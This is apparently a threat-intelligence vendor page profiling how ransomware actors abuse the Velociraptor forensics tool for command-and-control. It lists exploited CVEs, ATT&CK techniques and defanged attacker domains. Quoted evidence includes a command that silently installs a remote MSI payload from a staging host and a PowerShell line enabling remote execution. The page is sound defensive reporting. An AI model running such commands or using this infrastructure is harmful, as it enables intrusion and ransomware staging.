Skip to main content
Mallory
Back to malware
MalwareRansomwareUsed by 2 actorsExploits 11 CVEs

Velociraptor

Velociraptor is a legitimate open-source digital forensics and incident response (DFIR) tool that threat actors have repeatedly abused as a post-compromise remote access, command-and-control, persistence, and tunneling framework. Reporting in the provided content ties its malicious use to ransomware intrusions involving Warlock, LockBit, and Babuk, and to activity attributed to Storm-2603 (also tracked as GOLD SALEM / Gold Salem / CL-CRI-1040), with additional use noted by operators associated with The Gentlemen RaaS and in SolarWinds Web Help Desk exploitation cases. Observed capabilities when misused include remote command execution, artifact collection, endpoint control, deployment as a Windows service, use as a backdoor, and establishment of covert tunnels including Visual Studio Code tunnel abuse and Cloudflare-based tunnel infrastructure. Multiple incidents describe attackers installing Velociraptor via MSI payloads such as v2.msi, v3.msi, and v4.msi, often fetched with msiexec from Cloudflare Workers, Supabase, or other staging infrastructure.

The content links Velociraptor abuse to several initial access paths and intrusion chains, including exploitation of Microsoft SharePoint ToolShell vulnerabilities (including CVE-2025-49704 and CVE-2025-49706), SolarWinds Web Help Desk vulnerabilities (including CVE-2025-26399, CVE-2025-40536, and CVE-2025-40551), SmarterMail vulnerabilities CVE-2026-23760 and CVE-2026-24423, and WSUS exploitation associated with CVE-2025-59287. In these cases, attackers used Velociraptor after initial compromise to maintain access, move toward domain compromise, stage ransomware, and support stealthy operations. The content specifically notes use against Windows servers and endpoints, VMware ESXi environments in ransomware operations, and victims across sectors including government, commercial enterprises, MSPs, and organizations affected through exposed internet-facing infrastructure.

Several reports emphasize abuse of outdated Velociraptor version 0.73.4 / 0.73.4.0. The content states attackers deployed this version because it was susceptible to CVE-2025-6264, which enabled privilege escalation, arbitrary command execution, and endpoint takeover. In observed campaigns, Velociraptor was configured to communicate with attacker-controlled infrastructure including velo[.]qaubctgg[.]workers[.]dev, auth.qgtxtebl.workers[.]dev, update[.]githubtestbak[.]workers[.]dev, and chat.hcqhajfv.workers[.]dev. Additional related infrastructure and delivery locations mentioned in the content include files[.]qaubctgg[.]workers[.]dev, royal-boat-bf05.qgtxtebl.workers[.]dev, and Supabase-hosted MSI payloads. Associated detections and artifacts mentioned include Troj/Agent-BLMR, Troj/BatDl-PL, Troj/Mdrop-KDK, ServiceEXE identified as the Velociraptor binary, and configuration files containing attacker server_url values.

Across the provided reporting, Velociraptor is consistently described not as malware by design but as a legitimate security tool repurposed by threat actors for stealthy C2, persistence, lateral enablement, and ransomware precursor activity.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

EXPLOITED CVES

Vulnerabilities exploited

11 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

11 CVES
CVE-2025-53770ToolShell unauthenticated RCE in Microsoft SharePoint Server

Velociraptor is a digital forensics and incident response (DFIR) tool that we have seen threat actors abuse recently in attacks in order to set up command-and-control (C2) communications.

via huntress bloghuntress.com
CVE-2025-6264Privilege escalation in Rapid7 Velociraptor Admin.Client.UpdateClientConfig artifact

Threat actors have started to use the Velociraptor digital forensics and incident response (DFIR) tool in attacks that deploy LockBit and Babuk ransomware.

via bleeping computerbleepingcomputer.com
CVE-2025-49706Improper authentication spoofing vulnerability in Microsoft Office SharePoint

Velociraptor is a digital forensics and incident response (DFIR) tool that we have seen threat actors abuse recently in attacks in order to set up command-and-control (C2) communications.

via huntress bloghuntress.com
CVE-2025-53771Microsoft SharePoint ToolShell path traversal spoofing vulnerability

Velociraptor is a digital forensics and incident response (DFIR) tool that we have seen threat actors abuse recently in attacks in order to set up command-and-control (C2) communications.

via huntress bloghuntress.com
CVE-2025-49704Remote Code Execution in Microsoft Office SharePoint

Velociraptor is a digital forensics and incident response (DFIR) tool that we have seen threat actors abuse recently in attacks in order to set up command-and-control (C2) communications.

via huntress bloghuntress.com
CVE-2025-59287Unauthenticated RCE in Windows Server Update Services (WSUS)

Velociraptor is a digital forensics and incident response (DFIR) tool that we have seen threat actors abuse recently in attacks in order to set up command-and-control (C2) communications.

via huntress bloghuntress.com
CVE-2026-24423Unauthenticated RCE in SmarterTools SmarterMail ConnectToHub APIExploited in the wild

"CVE-2026-24423... exploits a weakness in the ConnectToHub API method to achieve unauthenticated remote code execution (RCE)."

via the hacker newsthehackernews.com
CVE-2026-23760Authentication Bypass in SmarterTools SmarterMail Password Reset APIExploited in the wild

"CVE-2026-23760 is an authentication bypass flaw that could allow any user to reset the SmarterMail system administrator password by sending a specially crafted HTTP request."

via the hacker newsthehackernews.com
CVE-2025-26399Unauthenticated AjaxProxy deserialization RCE in SolarWinds Web Help DeskExploited in the wild

Huntress reported active exploitation of SolarWinds Web Help Desk vulnerabilities (CVE-2025-26399 and CVE-2025-40551) by unidentified threat actors, deploying remote management tools and Velociraptor for command and control.

via cert eu threat intelcert.europa.eu
CVE-2025-40551Unauthenticated RCE in SolarWinds Web Help Desk DeserializationExploited in the wild

Huntress reported active exploitation of SolarWinds Web Help Desk vulnerabilities (CVE-2025-26399 and CVE-2025-40551) by unidentified threat actors, deploying remote management tools and Velociraptor for command and control.

via cert eu threat intelcert.europa.eu
CVE-2025-40536Security Control Bypass in SolarWinds Web Help Desk

"Shortly after reconnaissance, the attacker deployed Velociraptor, an open-source DFIR platform... its ability to execute commands, collect artifacts, and remotely control endpoints makes it an effective command-and-control (C2) framework when misused."

via cyber security newscybersecuritynews.com
THREAT ACTORS

Groups observed using it

2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
Storm-2603

In August, CTU researchers observed GOLD SALEM abusing the legitimate open-source Velociraptor digital forensics and incident response (DFIR) tool to establish a Visual Studio Code network tunnel within the compromised environment. Some of these incidents ended in Warlock ransomware deployment.

via sophos threat researchsophos.com
Warlock

...followed by dropping additional payloads like Velociraptor and the locker to encrypt files.

via the hacker newsthehackernews.com
MITRE ATT&CK

Techniques & procedures

20 distinct techniques documented for this family, organized by ATT&CK tactic.

T1583Acquire InfrastructureEvidence1

The attacker prepared their own Elastic Cloud free trial, using legitimate Elastic infrastructure, using it as a repository for stolen data across intrusions.

Initial Access

1 technique
T1190Exploit Public-Facing ApplicationEvidence4

"CVE-2026-23760 enables authentication bypass via the password reset API... allowing anyone to reset a password by supplying just a username."

Execution

5 techniques
T1053Scheduled Task/JobEvidence2

"the attackers use this tool—designed for incident response—to maintain persistence and 'set the stage' for their ransomware payload."

T1059Command and Scripting InterpreterEvidence1
TacticExecution

These tactics are in addition to previous post-exploit tools and techniques used by the group, which included the Velociraptor digital forensics and incident response (DFIR) tool as its primary command-and-control (C2) framework...

T1059.001PowerShellEvidence2
TacticExecution

PSRemoting, a built-in Windows feature for remote administration, was enabled and used to execute PowerShell commands on remote systems. C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe "Enable-PSRemoting -Force -SkipNetworkProfileCheck" | We observed three related PowerShell executions through Velociraptor, all following the same fileless execution pattern: Downloading remote bytes, Loading them directly into memory via [Reflection.Assembly]::Load() , and Executing them with .EntryPoint.Invoke() .

T1059.003Windows Command ShellEvidence2
TacticExecution

"the Java process executed cmd.exe to silently install a remote MSI payload: msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi"

T1569.002Service ExecutionEvidence2
TacticExecution

"used the SmarterMail process MailService.exe to spawn a command shell"

Persistence

2 techniques
T1053Scheduled Task/JobEvidence2

"the attackers use this tool—designed for incident response—to maintain persistence and 'set the stage' for their ransomware payload."

T1556Modify Authentication ProcessEvidence1

"CVE-2026-23760 is an authentication bypass flaw that could allow any user to reset the SmarterMail system administrator password by sending a specially crafted HTTP request."

T1053Scheduled Task/JobEvidence2

"the attackers use this tool—designed for incident response—to maintain persistence and 'set the stage' for their ransomware payload."

T1068Exploitation for Privilege EscalationEvidence2

"used an outdated version of the Velociraptor, 0.73.4, which is vulnerable to a privilege escalation flaw that allows increasing permissions on the host."

Stealth

4 techniques
T1036MasqueradingEvidence1
TacticStealth

The Velociraptor installer was disguised as " v4.msi "... In our previous report, the threat actors renamed rclone.exe to TrendSecurity.exe to appear legitimate. In this incident, the file that was renamed to TrendSecurity.exe functioned as a loader... The threat actors continue to use a renamed version of the legitimate tool rclone.exe (disguised as TrendFileSecurityCheck.exe )

T1218System Binary Proxy ExecutionEvidence1
TacticStealth

"...installs Velociraptor, a legitimate digital forensics tool... to maintain access and set the stage for ransomware."

T1218.007MsiexecEvidence2
TacticStealth

"...download a malicious MSI installer (\"v4.msi\")..."

T1497.003Time Based ChecksEvidence1

"...install files and wait approximately 6–7 days before taking further action... malicious activity was triggered later."

T1556Modify Authentication ProcessEvidence1

"CVE-2026-23760 is an authentication bypass flaw that could allow any user to reset the SmarterMail system administrator password by sending a specially crafted HTTP request."

Credential Access

2 techniques
T1003OS Credential DumpingEvidence1

Velociraptor Used as a covert C2 platform, including memory and LSASS dumping... KslDump Dumps Kerberos / LSASS-related material... buildx641 ... uses ... ntds.dit, and SYSTEM copies...

T1556Modify Authentication ProcessEvidence1

"CVE-2026-23760 is an authentication bypass flaw that could allow any user to reset the SmarterMail system administrator password by sending a specially crafted HTTP request."

Discovery

1 technique
T1497.003Time Based ChecksEvidence1

"...install files and wait approximately 6–7 days before taking further action... malicious activity was triggered later."

Lateral Movement

1 technique
T1021.002SMB/Windows Admin SharesEvidence1

"Storm-2603 chains this access with the software's built-in 'Volume Mount' feature to gain full system control."

T1071Application Layer ProtocolEvidence4

Velociraptor, for command-and-control (C2). Visual Studio Code and Cloudflare Tunnel, for tunneling C2 communications. Yuze, for intranet penetration and establishing a reverse proxy connection to the attacker's C2 server across HTTP (port 80), HTTPS (port 443), and DNS (port 53).

T1090ProxyEvidence2

For remote access and C2, they rely on frameworks like ZeroPulse and Velociraptor, combined with Cloudflare-based tunnels and custom VPN setups to keep stable access into compromised networks.

T1105Ingress Tool TransferEvidence14

These methods include exploiting the Nsec driver with a new BYOVD technique as well as using the remote-access tool TightVNC and the reverse-proxy tool Yuze...

T1219Remote Access ToolsEvidence5

CTU researchers observed GOLD SALEM abusing the legitimate open-source Velociraptor digital forensics and incident response (DFIR) tool to establish a Visual Studio Code network tunnel within the compromised environment.

Exfiltration

1 technique
T1041Exfiltration Over C2 ChannelEvidence1

Data exfiltration is then carried out using automated tools and tuned configurations to move large volumes of data efficiently...

INDICATORS OF COMPROMISE

IOCs tracked for this family

6 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
4 tracked

IPs, domains, and DNS infrastructure linked to this family.

Other
2 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
domain●●●●●●●●●●●●View more in app3 months ago
uri●●●●●●●●●●●●View more in app3 months ago
domain●●●●●●●●●●●●View more in app3 months ago
domain●●●●●●●●●●●●View more in app6 months ago
domain●●●●●●●●●●●●View more in app6 months ago
uri●●●●●●●●●●●●View more in app6 months ago
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching6

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution2

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities11

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping20

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.